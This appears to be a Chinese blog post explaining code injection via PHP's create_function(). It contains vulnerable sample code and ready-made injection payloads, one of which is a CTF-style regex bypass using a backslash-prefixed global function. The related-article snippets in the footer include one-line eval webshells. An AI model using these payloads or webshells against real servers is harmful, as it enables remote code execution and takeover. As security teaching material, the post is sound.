php 命名空间 create_function,PHP create_function()注入命令执行漏洞

最新推荐文章于 2023-08-12 17:44:40 发布
最新推荐文章于 2023-08-12 17:44:40 发布
阅读量405 收藏
点赞数
文章标签: php 命名空间 create_function

0x00 create_function()介绍

create_function()创建匿名函数

string create_function ( string $args , string $code )

string

math?formula=args%20%E5%8F%98%E9%87%8F%E9%83%A8%E5%88%86%20stringcode 方法代码部分

举例:

create_function('$name','echo $name."A"')

类似于:

function name($name) {

echo $name."A";

}

0x01 漏洞利用

1

//02-8.php?id=2;}phpinfo();/*

$id=$_GET['id'];

$str2='echo '.$a.'test'.$id.";";

echo $str2;

echo "
";

echo "==============================";

echo "
";

$f1 = create_function('$a',$str2);

echo "
";

echo "==============================";

?>

payload:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

原理:

id=2;}phpinfo();/*

执行函数为:

源代码:

function fT($a) {

echo "test".$a;

}

注入后代码:

function fT($a) {

echo "test";}

phpinfo();/*;//此处为注入代码。

}

2

//how to exp this code

$sort_by=$_GET['sort_by'];

$sorter='strnatcasecmp';

$databases=array('test','test');

$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';

usort($databases, create_function('$a, $b', $sort_function));

?>

payload:

func.php?sort_by="]);}phpinfo();/*

3

error_reporting(0);

if(isset($_GET['action'])){

$action=$_GET['action'];

}

if(isset($_GET['action'])){

$arg=$_GET['arg'];

}

if(preg_match('/^[a-z0-9_]*$/isD',$action)){

show_sourse(_FILE_);

}else{

$action($arg,'');

}

?>

正则绕过,数字字母下划线都被禁止.

思路就是在开头或结尾插入字符绕过检测,涉及到php全局命名空间:在函数的头部加上 \就是调用全局的此函数,即\create_function()就是调用全局的create_function()函数,同时函数头部加上\可绕过正则过滤,\即%5c.

漏洞利用处

math?formula=action(arg,'');,也就是说如果利用create_function()函数漏洞,这里是参数为GET值,执行代码为空

payload:

ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*

weixin_39716044
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
create_function.py
05-21
自上而下分析中的递归分析法。本资源是其中一环,建议配博文分析。可以自动根据文法的非终结符自动地创建每一个子程序。python编写
PHP常见函数漏洞
Elite的博客
04-11 2569
常见的PHP特性(bug)总结,干货满满哦
代码执行漏洞-无字母数字RCE-create_function()
qq_51550750的博客
02-14 1052
代码执行漏洞 eval()函数 <?php eval($_POST[0]);?> eval会把接收到的字符串当作PHP代码来执行(一句话木马) 利用这个可以连接蚁剑,而连接密码就是中括号中的值–$_POST[0]中就是这个‘0’作为连接密码 无字母数字RCE 苛刻条件的 RCE 取反 、 异或 的绕过方法 比如下面的例子: 异或的方法: XOR.php 执行就是 终端 php XOR.php 利用PHP7的特性—动态函数执行调用: 如果是system(ls)—一次是system
php create_function()产生的漏洞
yy2013
11-03 3010
create_function(‘参数’,’函数体’):官方example:<?php $newfunc = create_function('$a,$b', 'return "ln($a) + ln($b) = " . log($a * $b);'); echo "New anonymous function: $newfunc\n"; echo $newfunc(2, M_E) . "\n";
Web 应用渗透测试 01 - 命令注入(Code Injection)之 create_function
0pr
02-04 1081
这篇文章将讨论 PHP Web 应用中 **create_function** 的命令注入命令注入,究其根源,都是未对用户提供的输入做合理过滤造成的。当然,编程语言本身内置的危险方法的使用,是命令注入频发的另一原因。
Web安全之命令执行漏洞
最新发布
qq_42751192的博客
08-12 1285
当 Web 应用需要调用一些执行系统命令的函数时,并且用户能控制这些函数中的参数时,就可以将恶意系统命令拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞
create_html_from_php_array
04-01
PHP数组创建HTML 使用此功能,您可以从PHP数组非常容易地创建HTML。 样品,简单高效的结构。 用户友好-通过数组并开始使用 用法 ... function () { return array ( array ( "?div" => "name" ,
php_function_crud:用PHP native付款学校
03-27
PHP原生CRUD操作详解:为学校支付系统构建基础】 在PHP开发中,CRUD(Create, Read, Update, Delete)是四个基本的操作...通过`php_function_crud-master`这个项目,你可以进一步学习如何在实际场景中应用这些概念。
PHP stream_context_create()作用和用法分析
12-17
`PHP stream_context_create()`函数是PHP中用于创建和配置数据流上下文的重要工具。这个函数允许开发者在执行如`fopen()`、`file_get_contents()`等文件操作时,添加特定的选项,比如设置超时时间、指定代理服务器、...
MySQL 5.7 create VIEW or FUNCTION or PROCEDURE
09-09
CREATE FUNCTION calculate_discount(amount DECIMAL(10,2), discount_rate DECIMAL(4,2)) RETURNS DECIMAL(10,2) BEGIN DECLARE discounted_amount DECIMAL(10,2); SET discounted_amount = amount * (1 - ...
命令执行漏洞php函数,PHP create_function注入命令执行漏洞
weixin_35755562的博客
03-16 471
PHP中使用create_function()创建匿名函数,如果没有严格对参数传递进行过滤,攻击者可以构造特殊字符串传递给create_function()执行任意命令。以如下代码为例://how to exp this code$sort_by=$_GET['sort_by'];$sorter='strnatcasecmp';$databases=array('test','test');$s...
[php代码审计]之create_function()函数
o3Ev的博客
04-14 1623
[php代码审计]之create_function 这篇文章结合了许多师傅的博客,再加上了一点我自己的心得 文章目录creat_function()介绍使用官方手册使用实际例子0x010x02代码分析参考博客 creat_function()介绍 适用范围:php4>=4.0.1,php5,php7 功能: 根据传递的参数创建匿名函数,并为其返回唯一名称 语法: creat_function(string $agrs,string $code) //string $agrs 声明的函数变量部分 //s
PHP代码 之create_function()函数
snowlyzz的博客
10-05 4205
create_function 详解
代码执行漏洞详解
m0_55854679的博客
03-13 4304
文章目录小知识漏洞原理相关函数eval()函数assert()函数preg_replace()函数create_function()函数array_map()函数特殊组合(双引号二次解析) 小知识 代码审计: 通读全文【新手建议读blueCMS】。 危险函数定位【代码审计工具】。 利用曾经出现过的漏洞漏洞原理 用户输入的数据被当做后端代码进行执行。 <?php @eval($_REQUEST[8])?> ,其实一句话木马的本质就是一个代码执行漏洞。 这里提一个概念叫RCE远程命令或者代
Code-Breaking Puzzles easy - function(匿名函数利用)
烟敛寒林的博客
05-09 880
题目地址:http://120.78.164.84:49001/ <?php $action = $_GET['action'] ?? ''; $arg = $_GET['arg'] ?? ''; if(preg_match('/^[a-z0-9_]*$/isD', $action)) { show_source(__FILE__); } else { $action(...
2021-8-23 [BJDCTF2020]EzPHP 知识点:php超全局变量,create_function,各种php的bypass
m0_51326092的博客
08-23 311
首先,本文借鉴的大老婆博客如下: 出题大佬博客,详细讲解了各种知识点 一位大佬的详细解题过程(偷懒,自己就不写了) 就简单写写(赋值粘贴)一些比较重要的知识点(× create_function函数: 看似平平无常,却暗藏杀机 <?php $myFunc = create_function('$a, $b', 'return($a+$b);}eval($_POST['Y1ng']);\\'); ?> 执行后,很明显有一句话注入,可以拿到权限 function myFunc($a, $b){
PHPcreate_function的用法总结
azzfanke的专栏
12-22 7785
php中,函数create_function主要用来创建匿名函数,有时候匿名函数可以发挥它的作用。 1.测试一 测试一主要用来循环替换数组中多个值的,我们用array_map加上create_function解决这个问题。 ############################################### function filterChars($a) {
PHP学习笔记8:函数
梦幻天空
12-05 1015
PHP学习笔记8:函数 图源:php.net 定义 php的函数可以定义在任何地方,甚至是条件语句中: function create_func(int $num){ if ($num<10){ function test(){ echo "test function is called".PHP_EOL; echo "the \$num < 10"; } } else{ f
PHP代码注入与系统命令注入知识点总结
* create_function():create_function()函数可以创建一个匿名函数,并将其作为PHP代码执行。 * preg_replace():preg_replace()函数可以使用/e 修饰符来执行PHP代码。 **防御方法** 为了防止PHP代码注入,需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值